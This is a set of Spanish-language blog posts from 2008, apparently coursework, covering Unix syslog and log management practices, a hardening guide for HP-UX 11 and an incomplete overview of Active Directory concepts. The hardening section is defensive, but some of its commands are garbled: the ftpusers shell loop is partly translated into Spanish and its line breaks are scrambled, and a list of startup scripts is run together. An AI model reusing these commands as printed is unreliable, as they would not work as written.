LOCAL0 a LOCAL7. Reservados para uso local del equipo
LPR. Subsistema de impresión
MAIL. Subsistema de correo electrónico
NEWS. Subsistema de USENET
SYSLOG. Mensajes generados internamente por el syslogd
USER. Mensajes genéricos a nivel de usuario
UUCP. Subsistema de UUCP

La lista de niveles disponibles para el syslogd es:
EMERGE. El sistema esta inservible
ALERT. Alguna acción debe ser tomada inmediatamente
CRIT. Condiciones críticas
ERR. Condiciones de error
WARNING. Condiciones de advertencia
NOTICE. Condición normal pero significativa
INFO. Mensaje informativo
DEBUG. Mensaje de depuración

Problemática
Una desventaja del sistema de auditoría en Unix puede ser la complejidad que puede alcanzar una correcta configuración; por si la dificultad del sistema no fuera suficiente, en cada Unix el sistema de logs tiene peculiaridades que pueden propiciar la pérdida de información interesante de cara al mantenimiento de sistemas seguros. Aunque muchos de los ficheros de log son comunes en cualquier sistema, su localización, o incluso su formato, pueden variar entre diferentes versiones de Unix.

Dentro de Unix hay dos grandes familias de sistemas: se trata de System V y BSD; la localización de ficheros y ciertas órdenes relativas a la auditoría de la máquina van a ser diferentes en ellas, por lo que es muy recomendable consultar las páginas del manual antes de ponerse a configurar el sistema de auditoría en un equipo concreto.

ANÁLISIS
Cada una de las etapas descritas para la administración de logs es crítica, así si se cuenta con un sistema de centralización bien diseñado e implementado pero a su vez, no se logra un buen método de administración de los archivos en el servidor de logs (rotación y comprobación integridad ), el sistema de administración como tal será ineficiente.
Los archivos de logs aunque son básicos a la hora de una investigación de intrusiones en los sistemas informáticos, siempre hay que tener en mente que son esenciales a la hora de tomar medidas legales contra esos intrusos.

Despues de la lectura considero que las mejores practicas para la administración y monitoreo de logs,son las siguientes:

Rotación de logs. Cuidando no se desborde el almacenamiento y el tiempo exacto del los logs.
Protección de logs. Buscando que los logs sean: exactos, autentificables y accesibles.
Exactos. Registrar todo en los logs, mantener el tiempo real y usar múltiples sensores para registrar eventos.
Autenticidad. Se debe probar que no han sido modificados desde que fueron registrados, a través de: cambar los Logs de lugar en en sistema, el uso de Firmas, Encripción y Checksums, evitar trabajar con logs originales y utilizar copias, auditar permanentemente todos los cambios que se produzcan en el sistema y documentar los procesos.
Accesibilidad o control de acceso. El log creado debe ser auditado y protegido para prevenir accesos no autorizados; mediante la restricción en el acceso a archivos y la Cadena de custodia, es decir establecer otros medios de almacenamiento secundario.
Almacenaje de logs. Tomar en cuenta Medios en los que se almacenaran los logs, en base a su importancia, tiempo de vida (del medio y de la información) y confidencialidad.
Uso de herramientas de administración de logs. Las cuales incluye el mismo sistema operativo: syslog; o software adicional como tripwire o logrotate.
Uso de herramientas de monitorización y análisis de logs. LogCheck, LogWatch, CDM,

Entre otras las herramientas de amplio uso para el monitoreo de UNIX son las siguientes: Tripwire, CDM, TANGO04, SAMHAIN, Snort, Osiris, Centrify DirectAudit, logrotate, etc.

REFERENCIAS.

http://congreso.seguridad.unam.mx/informacion/
Congreso de seguridad, Administración en sistemas Unix

http://www.ceyusa.com/documentos/cfe/
Manual de Administración del Sistema Operativo Unix

http://www2.sas.com/proceedings/sugi26/
MONITORING USAGE OF UNIX SOFTWARE

http://www.simson.net/ref/ugh.pdf y http://downloads.techrepublic.com.com/
The UNIXHATERS Handbook

http://i.i.com.com/cnwk.1d/i/tr/downloads/home/
Log_monitoring_and_management.pdf

http://www.cisco.com/warp/public/707/
Best Practices for Cisco Secure ACS for UNIX Administration

http://linux.sys-con.com/read/46186.htm
Best Practices for Managing Your Linux/Unix Performance and Availability

http://www.securityfocus.com/infocus/1771
Host Integrity Monitoring: Best Practices for Deployment

http://enterpriselinuxlog.blogs.techtarget.com/
10 IT system monitoring best practices

www.unal.edu.com/seguridad
Lista de chequeo de elementos esenciales de seguridad en el Sistema Operarivo

www.ceyusa.com
Administración del Sistema Operativo Unix

http://www.counterpane.com/log-analysis.html

HARDENING UNIX HP-UX 11

2008-01-24T07:34:00.000-08:00

INTRODUCCION
HP-UX es la versión de Unix desarrollada y mantenida por Hewlett-Packard desde 1983, ejecutable típicamente sobre procesadores HP PA RISC y en sus últimas versiones sobre Intel Itanium (arquitectura Intel de 64 bits); a pesar de estar basada ampliamente en System V incorpora importantes características BSD. Existen numerosas instalaciones de sistemas más antiguos, especialmente HP-UX 10.x (1995-97) o incluso 9.x. (1992-95). Apartir de la versión 11.11 (2000) se usa un sistema de numeración doble, así la 11.11 es también conocida como 11i, la 11.20 es 11iv1.5 y así sucesivamente hasta la actual 11.23 (11iv2). Hasta su ultima versión 11.31 (11iv3) en febrero del 2007.
HP-UX es, como la mayor parte de Unix comerciales, un entorno de trabajo flexible, potente y estable, que soporta una variedad de aplicaciones que van desde simples editores de texto a complicados programas de diseño gráfico o cálculo científico, pasando por sistemas de control industrial que incluyen planificaciones de tiempo real.
Durante los últimos años Hewlett-Packard, como muchos otros fabricantes, parece haberse interesado bastante por la seguridad en general, y en concreto por los sistemas de protección para sus plataformas; prueba de ello es la gama de productos relacionados con este campo desarrollados para HP-UX, como el sistema de detección de intrusos IDS/9000 para HP-UX 11.x corriendo sobre máquinas HP-9000 o la utilidad Security Patch Check, similar al PatchDiag de Sun Microsystems. También es importante destacar las grandes mejoras en cuanto a seguridad del sistema se refiere entre HP-UX 9.x, HP-UX 10.x y muy especialmente HP-UX 11.x.
Una visión general de UNIX es que este sistema requiere un cuidado especial y una administración activa. Dennis Ritchi, uno de los creadores originales, escribió lo siguiente acerca de la seguridad de UNIX, “Unix no fue diseñado para ser seguro, Fue diseñado con las suficientes características para hacer a la seguridad practica”. Unix tiene varios mecanismos de seguridad disponibles. Sin embargo, estos serán inútiles cuando el sistema esta mal configurado, usado despreocupadamente, o contiene software de dudosa procedencia.

EL ENTORNO DE SEGURIDAD

Las computadoras y elementos de red conectados a redes, son vulnerables a un gran número de ataques, tales como:

1. Programas Backdoor
2. Programas Sniffing
3. Password grabber y herramientas de cracking
4. Aprovechamiento de defectos en los servicios del sistema operativo
5. Negación de servicio (DoS)

Algunos de esto ataques están basados en técnicas que son publicas, con scripts y otras herramientas disponibles a crackers con poco conocimiento para aplicar exploits en contra del sistema. Una vez que el sistema se ha visto comprometido, un intruso puede hacer varias cosas, dentro de las cuales se encuentran las siguientes:

1. Modificar o destruir información
2. Revelar información clasificada
3. Instalar código malicioso para reunir información
4. Utilizar el servidor comprometido para atacar otros sistemas

Cabe mencionar que ningún sistema es absolutamente seguro, pero medidas deben ser establecidas para fortalecer el sistema operativo. Una continua vigilancia es requerida para mantener los sistemas seguros.

EL INICIO

Para comenzar nuestro proceso de fortalecimiento es necesario saber como es que el atacante pudo tener acceso a nuestro sistema, cuales fueron sus recursos, esto con el fin de negarle esos recursos tratando de neutralizar su avance o por lo menos no facilitarle las cosas.

El atacante principia por obtener información acerca del sistema que va a ser su blanco. Esto es toma en cuenta lo siguiente:

· Que clase de maquina es?
· Cual es el nombre de la maquina?
· Cual es la versión del sistema operativo?
· Que aplicaciones se ejecutan en la maquina?
· Cuales son los nombres de acceso al sistema?
· Que tan bien esta administrada la maquina?
· El administrador esta en línea?

La siguiente lista provee de comandos y servicios que proveen información acerca del sistema, algunos de estos ni siquiera requieren un nombre de usuario valido o clave.

Dtgreet
telnet
finger
sendmail
rwho
ruptime
rusers
rstat
swlist
rpcinfo
showmount
snmpd

FORTALECIENDO HP-UX 11

Instalación mínima del sistema y aplicación de parches
Se asume que el servidor tiene la imagen mas pequeña posible de OS instalada y los últimos parches desarrollados han sido instalados. La reducción del tamaño implica menos servicios y mayor seguridad. Pero podría causar inconvenientes. Se deberá escoger seguridad sobre inconveniencia – si existe duda acerca del servicio, deshabilítelo y observe el efecto.

Se recomienda que la configuración básica sea como sigue:

Primary Swap Size [ 256Mb ->]
Secondary Swap Size [ None ->]
Software Selection [ Minimal system, networking (Eng.) ->]
Software Language [ English ->]
Locale Setting [ default (C) ->]
File System file name length [ Long ->]
/home Configuration [ None ->]
How many disks in root group [ One ->]
Make volatile dirs separate [ True ->]
Create /export volume [ False ->]

Es recomendable que los siguientes parches sean cargados:

Accounting -> Accounting
InternetSrvcs -> General network applications and daemons
MailUtilities -> User mail agents and related tools
Networking -> HP-UX_11.x_LanLink_Product
NonHP-Terminfo -> Non HP terminfo files
OS-Core -> Core Operating System
SecurityMon -> SecurityMon
SystemAdmin -> HP-UX System Administration Tools
TextEditors -> TextEditors
TextFormatters -> TextFormatters

Con el fin de llevar a cabo una buena práctica de administración de parches es recomendable instalar el “security_patch_check” de HP para identificar los parches de seguridad necesarios. Esta utilidad es un programa de Perl que lleva a cabo lo siguiente:
Automáticamente descarga un catalogo de parches actuales de seguridad
Compara la base de datos de productos instalados con el catalogo de parches de seguridad
Compara un catalogo de productos con el catalogo de parches de seguridad
Identifica parches “warnings” que deberían ser removidos
Identifica parches nuevos que deben ser añadidos

Desactivar servicios innecesarios
Muchos servicios innecesarios se encuentran instalados por default cuando se instala el sistema operativo HP-UX 11.
El comando para lista los servicios es:
swlist –l product
Hay que considerar remover servicios que no sean necesarios:
K100dtlogin.rc S333hpsppci100 S525rarpd S660xntpdK200tps.rc S340net S530rwhod S700acctK900nfs.server S370named S535inetsvcs S705pwgrS006hpfc S400nfs.core S540sendmail S710hparamgrS008net.init S406nisplus.server S550ddfa S710hparrayS100swagentd S408nisplus.client S560SnmpMaster S720lpS120swconfig S410nis.server S565OspfMib S722pdS200clean_ex S420nis.client S565SnmpHpunix S730cronS202clean_uucp S430nfs.client S565SnmpMib2 S740supprtinfoS204clean_tmps S440comsec S565SnmpTrpDst S760auditingS206clean_adm S462maclan S570dce S770audioS220syslogd S490mrouted S590Rpcd S780slsdS230ptydaemon S500inetd S600iforls S800spaS300nettl S510gated S610rbootd S870swagentdS320hpether S520rdpd S620xfs S900hpfcmsS323hpbase100 S522ppp S630vt

Utilice el comando swremove para quitar productos no necesarios. Tal vez sea necesario utilizar –x
También es necesario remover todo lo contenido en los directorios /sbin/rc3.d, y /sbin/rc4.d

Configurar la sincronización de tiempo usando NTP

La sincronización de tiempo puede ser establecida por medio de xntpd (daemon) y ntpdate (client). Mientras el demonio puede proveer de más funcionalidades a la red, también representa vulnerabilidades, una de ellas es xntpd buffer-overflow. A diferencia de xntpd el cual escucha en el puerto 123 constantemente, ntpdate es un cliente el cual será ejecutado únicamente cuando sea necesario para obtener la hora del día desde un servidor NTP predefinido.
Se recomienda que ntpdate sea usado para establecer el sistema de reloj de acuerdo al servidor NTP en el Packet Core Network. Para la actualización precisa de la hora ejecute este comando cada hora:
0 * * * * /usr/sbin/ntpdate –s NTP_server_addr >> /var/log/ntpdate.log
El –s switch registrara acciones de ntpdate a través de syslog en lugar de mandarlo a la salida estándar.

Monitoreo de registros

Una vez que el atacante ha ganado acceso a nuestro sistema va llevar a cabo acciones no autorizadas, por lo cual es necesario llevar un monitoreo de quien se encuentra dentro del sistema y que esta haciendo.

Monitoreo de archivos de registro

El atacante generalmente revisa los registros para entender el uso del sistema basándose en patrones y elimina estos para no dejar rastro.
Se debe de llevar acabo un monitoreo de actividad inusual de los archivos los que se encuentran en los siguientes directorios:

/var/adm/btmp Intentos de acceso fallidos
/var/adm/cron/log Trabajos de cron completados
/var/adm/lp/log Registros de impresión
/var/adm/sulog Registro de uso del comando su
/var/adm/sw/swagent.log Registro del agente SD-UX
/var/adm/syslog/syslog.log Registro general de varios servicios
/var/adm/wtmp Intentos de acceso exitosos

Comandos:
# who –R Despliega a los usuarios que se encuentran en el sistema
# last –R Despliega a los usuarios que se encontraban en el sistema
# lastb –R Despliega una lista de accesos fallidos al sistema
# more /var/adm/sulog Despliega una lista de accesos fallidos y exitosos al sistema que hayan ejecutado el comando su

Monitoreo de conexiones de red

Se utilizan los siguientes comandos para este propósito

netstat –f inet
Este comando es una herramienta simple para monitorear conexiones de red actualmente establecidas. Con esto se podrá supervisar direcciones entrantes de nombres host no comunes.

Idlookup
En caso de notar una conexión de un host inusual, con este comando se puede determinar el ID del usuario del intruso en el host externo. Simplemente se debe de especificar la dirección IP del host y el número de puerto.

El demonio de los servicios de Internet (inetd) invoca procesos para manejar solicitudes de conexiones entrantes para una variedad de servicios de red. El demonio esta diseñado para invocar todos los servicios de Internet que se necesiten con el fin de reducir la carga del sistema. Este se ejecuta al inicio del sistema. El inetd comienza con la opción de registro deshabilitada. La opcion –l habilita el registro de conexiones dichos registro son almacenados en /var/adm/syslog/syslog.log

Monitoreo con SWATCH

Swatch es una herramienta simple escrita en Perl que esta diseñada para monitorear archivos de registro. El programa explora los registros, vigila actividad inusual y toma acciones cuando una entrada de registro sospechosa es identificada. Tales mensajes incluyen enviarle un mensaje al root, desplegar el mensaje en pantalla o ejecutar un programa.

Se puede ejecutar de la siguiente forma una vez que se haya efectuado la configuración de los archivos de control de la operación del programa.

# swatch –f /var/adm/syslog/syslog.log >/dev/console

Monitoreo de actividad sospechosa con IDS/9000

El sistema de detección de intrusos (Intrusión Detection System) provee un medio más conveniente y robusto para monitorear actividad sospechosa. Este programa monitorea actividades de usuarios y del sistema por medio de patrones que puedan corresponder a una violación de seguridad. Este al enterarse de una violación manda una alerta al administrador. Es de mencionar que este programa no evita un ataque, simplemente alerta de el para que se tomen acciones correspondientes. El IDS no identifica vulnerabilidades en el sistema.

Puntos de detección:
Modificación de archivos y directorios
Cambios de archivos de registro
Creación de archivos de configuración UID
Repeticiones de intentos de acceso fallidos
Repeticiones de intentos de uso del su fallidos
Ataques de condición de carreras (race attacks)
Ataques de buffer overflow
Modificación de otros archivos de usuarios
Monitoreo de inicio de sesiones interactivas
Monitoreo de entradas y salidas del sistema

Mejorando las claves de seguridad y de usuario con Trusted System

El sistema soporta una gran variedad de mecanismos de autentificación. La siguiente carta de comparación nos muestra una comparativa de características con el System Trusted, el cual es incluido en el producto SecurityMon.
La herramienta SAM (system administrador manager) es la recomendada para convertir el sistema en Trusted System. El SecurityMon debe estar instalado.

Los siguientes pasos son realizados por SAM durante el proceso de conversión:
• Archivo /etc/passwd es copiado al archivo /etc/passwd.old.save backup
• Claves son copiadas desde /etc/passwd a /.secure/etc/passwd
• Claves encriptadas en los archivos originales son reemplazados con “*”.
• ID Auditoria es creado para cada usuario.
• La bandera de auditoria es habilitada para todos los usuarios
• Archivos batch y crontab son convertidos para el uso de ID de Auditoria.

Control de Accesos

Accesos a archivos

Si el atacante logra entrar el sistema de permisos de los archivos es la última línea de defensa para proteger los datos. Configurar apropiadamente los permisos de los archivos es muy importante para la defensa del sistema.

Acciones del atacante:
Modificar /etc/passwd y otros archivos críticos
Remover entradas del sistema de archivos de registro
Insertar código malicioso en los ejecutables del sistema
Copiar archivos confidenciales

Los archivos tienen permisos de escritura, lectura y ejecución, al asignarle estos permisos dependiendo del tipo de archivo ayuda a reforzar el acceso a datos. Se utilizan los siguientes comandos:

chmod con las opciones r w x

SUID es un bit que permite usuarios sin privilegios la habilidad de realizar tareas privilegiadas. Nunca se deben de instalar programas con SUID a menos que sean de una fuente confiable. Se debe de utilizar el comando find para inventariar y monitorear programas SUID. Lo mismo se recomienda para SGID

Configurar control de acceso a la red.

Se necesita desactivar el acceso de red de root con el siguiente comando:
echo “console” > /etc/securetty

Con excepción de la consola, un usuario puede acceder como el mismo y entonces usar el comando su para volverse root. Entonces remover todas las entradas de “pseudo” cuentas en el archivo /etc/passwd file o configurarlas con claves para prevenir su uso con el acceso interactivo.

Desactive el uso de FTP para root y otras cuantas del sistema por medio de los siguientes comandos:
touch /etc/ftpusers
Para usuarios en root daemon bin sys nobody\
noaccess nobody4 uucp nuucp adm lp \ smtp listen do echo $user >> /etc/ftpusers
done chown root /etc/ftpusers
chgrp root /etc/ftpusers
chmod 600 /etc/ftpusers

Remueva soporte de .rhosts de /etc/pam.conf.

grep –v rhosts_auth /etc/pam.conf > \
/etc/pam.new
mv /etc/pam.new /etc/pam.conf
chown root /etc/pam.conf
chgrp sys /etc/pam.conf
chmod 644 /etc/pam.conf

Instale TCP Wrapper tcpd binario en /usr/sbin . Si se tiene necesidad de dejar telnet y FTP en el sistema, póngalos atrás de TCP Wrapper. Se recomienda el uso de SSH en lugar de telnet y FTP

Vulnerabilidades con NESSUS

Nessus es una herramienta que simplifica el proceso de búsqueda de vulnerabilidades, examinando los archivos de configuración local para identificar puntos débiles en el sistema. Este programa analiza cada puerto y trata de determinar que puertos pueden ser vulnerables a ataques en algunos casos, nessus nos explica porque y como el servicio puede ser deshabilitado.
Incluye un mecanismo de reporte muy flexible y puede ser ejecutado en modo no destructivo.
Fortaleciendo HP-UX con Bastille

Bastille es un programa, basado en la exploración del host, que examina la configuración actual del sistema, presenta una lista de verificación de medidas de seguridad recomendadas y basado en las respuestas del administrador procede hacer los cambios necesarios para fortalecer el sistema. Entre otras cosas, el programa deshabilita servicios que no son necesarios, remplaza mensajes de banner, habilita claves de acceso en inetd, modifica configuraciones del sistema y puede configurar el firewall. Si la configuración del programa es muy restrictiva Bastille puede revertir el proceso a su estado anterior.
Firewall; IPFilter

Objetivos:

Restringe el flujo de información entre las redes y hosts
Monitorea el flujo de información
Previene que los atacantes obtengan información del sistema y de la red

IPFilter es un programa que provee de un medio para el filtrado y registro de paquetes. Con esto es posible definir una lista de reglas para determinar que paquetes deben ser permitidos a través del filtro y cuales bloqueados. El filtrado esta basado en las direcciones fuente y destino, numero de puerto y protocolo de información almacenado en el encabezado del paquete.

LINKS
TEMAS
http://www.securitydocs.com/library/2237
UX-HP 11 Operating System Hardening, Guideline Document
http://www.blacksheepnetworks.com/security/resources/hp-ux11.html
Securing HP-UX 11 por Larry Harker, Mayo 30 2001
http://www.docs.hp.com
Guía para los administradores de sistemas HP-UX, Edición 9.

BIBLIOGRAFIA

Practical UNIX and Network Security Part 1 y 2 H3541S, Version D.02

ACTIVE DIRECTORY

2008-01-21T16:58:00.000-08:00

ACTIVE DIRECTORY

I. INTRODUCCIÓN.

II. SÍNTESIS.

A. Visión general de Active Directory.

B. Conceptos de Active Directory.
a. Catálogo global
b. Replicación
c. Relaciones de confianza
d. Espacio de nombres DNS
e. Espacio de nombres de dominio
f. Servidores de nombres
g. Convenios de nombres

C. Objetos de Active Directory

D. Esquema de Active Directory

E. Componentes de Active Directory
a. Estructuras lógicas.
b. Dominios.
c. Unidades organizativas.
d. Árboles.
e. Bosques.

F. Estructura física
a. Sitios.
b. Controladores de dominio

III. ANÁLISIS

IV. CONCLUSIÓN.
V. REFERENCIAS.

I. INTRODUCCIÓN.
Inicialmente, Windows 2000 se gestó como el sucesor y el integrador de todos los Windows. La idea original pasaba por incorporar en Windows 2000 las ‘features’ de PnP y resto de subsistemas probados y experimentados en la serie de Windows al consumo (9X). A lo largo de la fase beta de W2000, Microsoft se replanteó la posicion anterior, entiendo que correctamente, ya que el mercado no estaba preparado todavía para una transición completa a núcleo NT, y por tanto, el producto final que salió al mercado, siguió siendo un NT puro.

Windows 2000, no solo integró las nuevas tecnologías de soporte a hardware (PnP) realmente completo, sino que además integró y mejoró las funcionalidades definidas por las normas ACPI.

Otra de las grandes innovaciones en Windows 2000 fue el desarrollo del Active Directory. Realmente, la idea tampoco fue de Microsoft, sino que fue una implantación mejorada del servicio de Directorio de Novell.

Los servicios basados en la nueva filosofía del Directorio Activo, se ajustan más de cara al mundo real a la estrucutra de una organización, la implementación no fue del todo completa. Dicha implementación ha sido corregida en las versiones de Windows .NET.

II. SÍNTESIS.

A. Visión general de Active Directory.
Active Directory posee numerosas ventajas, no sólo el poder manejar instalaciones de cualquier tamaño, desde un único servidor con unos cientos de objetos hasta miles de servidores con millones de objetos. Active Directory también simplifica enormemente el proceso de localizar recursos a lo largo de una gran red. La Interfaz de servicios de Active Directory (ADSI, Active Directory Services Interface) permite a los desarrolladores hacer que sus aplicaciones soporten el directorio, proporcionando a los usuarios una única forma de acceder a múltiples directorios, ya estén basados en LDAP, NDS o en los Servicios de directorio de NT (NTDS, NT Directory Services).

Active Directory no es un directorio X.500. En cambio, utiliza LDAP como protocolo de acceso y soporta el modelo de información X.500 sin requerir sistemas que soporten toda la sobrecarga de X.500. LDAP está basado en TCP/IP y es considerablemente más simple que el DAP de X.500. Al igual que X.500, el modelo de directorio de LDAP se basa en entradas, donde se utiliza el nombre distinguido para identificar una entrada sin ambigüedad. Pero en lugar de utilizar la estructurada codificación de datos de X.500, LDAP adopta un enfoque sencillo basado en cadenas para representar las entradas de directorio. LDAP utiliza muchas de las técnicas de acceso a directorio especificadas en el estándar DAP de X.500 pero requiere menos recursos del cliente, haciéndolo más práctico cuando se tiende a usarlo sobre un enlace TCP/IP.

Active Directory también soporta directamente el Protocolo de transferencia de hipertexto (HTTP, Hypertext Transfer Protocol). El directorio soporta extensiones para que el Servicio de información de Internet (IIS, Internet Information Service) de Microsoft traduzca las peticiones HTTP para objetos del directorio en páginas HTML para mostrarlas en cualquier cliente HTML.

Active Directory permite un punto único de administración para todos los recursos públicos, entre los que se pueden incluir archivos, dispositivos periféricos, conexiones al host, bases de datos, accesos Web, usuarios, otros objetos arbitrarios, servicios, etc. Utiliza el DNS de Internet como servicio de localización, organiza los objetos en dominios dentro de una jerarquía de unidades organizativas (OU, Organizational Unit) y permite que varios dominios se conecten en una estructura en árbol. Los conceptos de Controlador primario de dominio (PDC, Primary Domain Controller) y Controlador de reserva del dominio (BDC, Backup Domain Controller) desaparecen. Active Directory sólo utiliza controladores de dominio, y las actualizaciones se replicarán en el resto de controladores de dominio.

B. Conceptos de Active Directory.
Hay varios conceptos nuevos que se presentan con Active Directory, como son el catálogo global, la replicación, las relaciones de confianza, el espacio de nombres DNS y el convenio para nombres. Es importante entender el significado de estos conceptos aplicados a Active Directory.
· Catálogo Global
· Replicación
· Relaciones de Confianza
· Espacio de Nombres DNS
· Servidores de Nombres
· Convenio de Nombres

Catálogo global
Es el almacén central de información sobre objetos en un árbol del bosque. De manera predeterminada, un catálogo global se crea automáticamente en el controlador de dominio inicial del bosque, conocido como servidor de catálogo global. Almacena una copia completa de todos los atributos de los objetos del directorio para su host de dominio y una copia parcial de todos los atributos de objetos que contiene el directorio de cada dominio en el bosque. La copia parcial almacena los atributos usados con más frecuencia en las operaciones de búsqueda (nombre y apellidos de usuario, nombre de inicio de sesión, etc.).

Los atributos de los objetos que se copian en el catálogo global heredan los mismos permisos que tienen en los dominios origen, garantizando la seguridad de los datos almacenados en el catálogo global.

Realiza dos funciones clave:
· Permite el inicio de sesión en red proporcionando información universal sobre pertenencia al grupo de un controlador de dominio cuando se realiza un proceso de inicio de sesión.
· Permite encontrar información de directorio con independencia de qué dominio del bosque contenga los datos en ese momento.

Cuando un usuario inicia la sesión en red, el catálogo global proporciona información universal de pertenencia al grupo para la cuenta a los controladores de dominio que procesan la información de inicio de sesión. Si sólo hay un controlador de dominio en el dominio, el controlador de dominio y el catálogo global son el mismo servidor. Si hay varios controladores

Replicación
La replicación garantiza que los cambios en un controlador de dominio se reflejen en todos los controladores de dominio de un dominio. La información del directorio se replica a los controladores de dominio tanto dentro como entre los sitios.

La información almacenada en el directorio se divide en tres categorías. Cada directorio contiene la siguiente información:
· Información de esquema. Define los objetos que se pueden crear en el directorio y los atributos que esos objetos pueden tener. Esta información es común a todos los dominios en el árbol de directorio o bosque.
· Información de configuración. Describe la estructura lógica de un desarrollo, con información como la estructura del dominio o la topología de replicación. Esta información es común a todos los dominios en el árbol de dominio o bosque.
· Datos del dominio. Describe todos los objetos del dominio. Estos datos son específicos del dominio y no se distribuyen a otros dominios.

Dentro de un sitio, Active Directory genera automáticamente una topología para la replicación entre controladores de dominio en el mismo dominio utilizando una estructura en anillo. La topología define la trayectoria para las actualizaciones de directorio de manera que dichas actualizaciones van desde un controlador de dominio a otro hasta que todos los controladores de dominio reciben las actualizaciones del directorio.

Para garantizar la replicación entre sitios, se debe personalizar la forma mediante la que Active Directory replica información utilizando vínculos de sitios para representar conexiones de red. Active Directory utiliza las informaciones de conexiones de red para generar objetos de conexión que proporcionan una replicación eficiente y tolerante a fallos.

Relaciones de confianza
Una relación de confianza en un vínculo entre dos dominios en el que el dominio que confía lleva a cabo la autenticación en el inicio de sesión del dominio en el que se confía.

Active Directory permite dos formas de relación de confianza:
· Confianza bilateral transitiva implícita. Una relación entre un dominio principal y secundario dentro de un árbol y entre los dominios de alto nivel del bosque. Es la relación de confianza predeterminada; las relaciones de confianza entre dominios en un árbol se establecen y mantienen implícitamente (automáticamente). La confianza transitiva es una característica del protocolo de autenticación Kerberos, que proporciona autenticación distribuida y autorización en Windows 2000. La confianza transitiva entre los dominios elimina la administración de cuentas de confianza entre dominios. Los dominios que son miembros del mismo árbol participan automáticamente en una relación de confianza transitiva y bilateral con el dominio principal. Como resultado, los usuarios en un dominio pueden acceder a los recursos a los que tienen permisos en otros dominios del árbol.
· Confianza explícita unidireccional no transitiva. Una relación entre dominios que no son parte de un mismo árbol. Una confianza no transitiva se circunscribe por dos dominios que forman la relación de confianza y no se transmite a otros dominios en el bosque. En la mayoría de los casos, se deben crear (de forma manual) explícitamente las confianzas no transitivas. La confianza explícita no transitiva unidireccional es la única forma posible de confianza en los siguientes casos: Un dominio Windows 2000 con un dominio Windows NT, Un dominio Windows 2000 en un bosque con un dominio Windows 2000 en otro bosque y un dominio Windows 2000 y un área MIT Kerberos V.

Espacio de nombres DNS
Active Directory, como todos los servicios de directorio, es por encima de todo un espacio de nombres. Un espacio de nombres es un área de circunscripción donde un nombre puede ser resuelto. La resolución de nombres es el proceso que se utiliza para traducir un nombre en algún objeto o información que representa el nombre. El espacio de nombres de Active Directory se basa en el esquema de nombres de DNS, que permite la interoperabilidad con las tecnologías de Internet. La redes privadas utilizan DNS con mucha frecuencia para resolver los nombres de equipos y localizar sus equipos dentro de su red local así como en Internet. La utilización de DNS aporta los siguientes beneficios:
· Los nombres de DNS son amigables, lo que significa que son más fáciles de recordar que las direcciones IP.
· Los nombres DNS permanecen de forma más constante que las direcciones IP'. Una dirección IP de un servidor puede cambiar, pero el nombre del servidor permanece igual.
· DNS permite a los usuarios enlazar sus servidores locales utilizando el mismo convenio de nombres que en Internet.

Espacio de nombres de dominio
El espacio de nombres de dominio es el esquema de nombres que proporciona la estructura jerárquica para la base de dates DNS. Cada nodo representa un partición de la base de datos DNS. A estos nodos se les denomina dominios.

La base de datos DNS está indexada por nombres, por tanto, cada dominio debe tener un nombre. Cuando se añaden dominios a la jerarquía, el nombre del dominio principal se añade al del dominio secundario (llamado subdominio). Come consecuencia, un nombre de dominio identifica su propia posición en la jerarquía.

La estructura jerárquica del espacio de nombres de dominio contiene típicamente un dominio raíz, dominios de nivel superior, dominios de segundo nivel y nombres de host.
Hay dos tipos de espacios de nombres:
· Espacio de nombres contiguo. El nombre del objeto secundario en una jerarquía de objetos siempre contiene el nombre del dominio principal. Un árbol es un espacio de nombres contiguo.
· Espacio de nombres discontinuo. Los nombres de un objeto.

Servidores de nombres
Un servidor de nombres DNS almacena el archivo de la base de datos de la zona. Los servidores de nombres pueden almacenar datos de una zona o de muchas zonas. Un servidor de nombres tiene autoridad sobre el espacio de nombres de dominio que comprende toda la zona.

Un servidor de nombres contiene el archivo maestro de la base de datos de la zona, que se conoce como archivo de base de datos de la zona principal, para la zona especificada.
Como consecuencia, debe haber por lo menos un servidor de nombres por cada zona. Los cambios en una zona, como pueden ser añadir dominios o hosts, se realizan en el servidor que contiene el archivo de base de datos de la zona principal.

Proporcionan redundancia. Si el servidor de nombres que contiene el archivo de base de datos de la zona principal falla, el resto de servidores de nombres pueden proporcionar el servicio.

Mejoran la velocidad de acceso para localizaciones remotas. Si hay clientes en localizaciones remotas, se pueden utilizar servidores de nombres adicionales para reducir el tráfico de preguntas a través de los enlaces de la red de área.

Reducen la carga en el servidor de nombres que contiene el archivo de base de datos de la zona principal.

Convenios de nombres
Cada objeto en Active Directory se identifica por su nombre. Active Directory utiliza una variedad de convenios de nombres: nombres completos, nombres completos relativos, identificadores globales únicos y nombres principales de usuarios.

Nombre completo. Cada objeto en Active Directory tiene un nombre completo (DN - Distinguished Name) que lo identifica de manera única y contiene suficiente información para que un cliente sea capaz de coger un objeto del directorio. El DN incluye el nombre del dominio que contiene al objeto, al igual que la ruta completa a través de la jerarquía del contenedor del objeto.

Nombre completo relativo. Active Directory soporta preguntas por atributos, de forma que se pueda localizar un objeto incluso en el caso de que el DN sea desconocido o haya cambiado. El hombre completo relativo (RDN - Relative Distinguished Name) de un objeto es la parte del hombre que es atributo del propio objeto. Se pueden tener RDN duplicados en los objetos de Active Directory, pero no se pueden tener dos objetos con el mismo RDN dentro de la misma OU

Identificador global único. Un identificador global único (GUID - Globally Unique IDentifier) es un número de 128 bits único, se asignan a los objetos cuando se crean, nunca cambia, incluso si se mueve o se renombra un objeto. Las aplicaciones pueden almacenar el GUID de un objeto y utilizarlo para acceder al objeto con independencia del DN actual del objeto.

Las cuentas de usuario tienen un nombre < amigable», el nombre principal de usuario (UPN - User Principal Name). El UPN se compone de un nombre «taquigráfico» de la cuenta de usuario y del nombre DNS del árbol donde el objeto de la cuenta de usuario está localizado.

C. Objetos de Active Directory
Active Directory almacena información sobre los recursos de red, al igual que sobre todos los servicios que permiten que la información se encuentre disponible y sea útil. Los recursos almacenados en el directorio, como pueden ser datos de usuarios, impresoras, servidores, bases de datos, grupos, equipos y directivas de seguridad, se denominan objetos.

Un objeto es un conjunto de atributos, diferenciado por un nombre, que representa un recurso de red. Los atributos de los objetos son características de los objetos del directorio. Por ejemplo, los atributos de una cuenta de usuario pueden incluir los nombres y apellidos del usuario, departamento y dirección de correo electrónico.

En Active Directory, los objetos se pueden organizar en clases, que son agrupaciones lógicas de objetos. Algunos ejemplos de clases de objetos son las cuentas de usuarios, grupos, equipos, dominios y unidades organizativas (OU - Organizational Units).

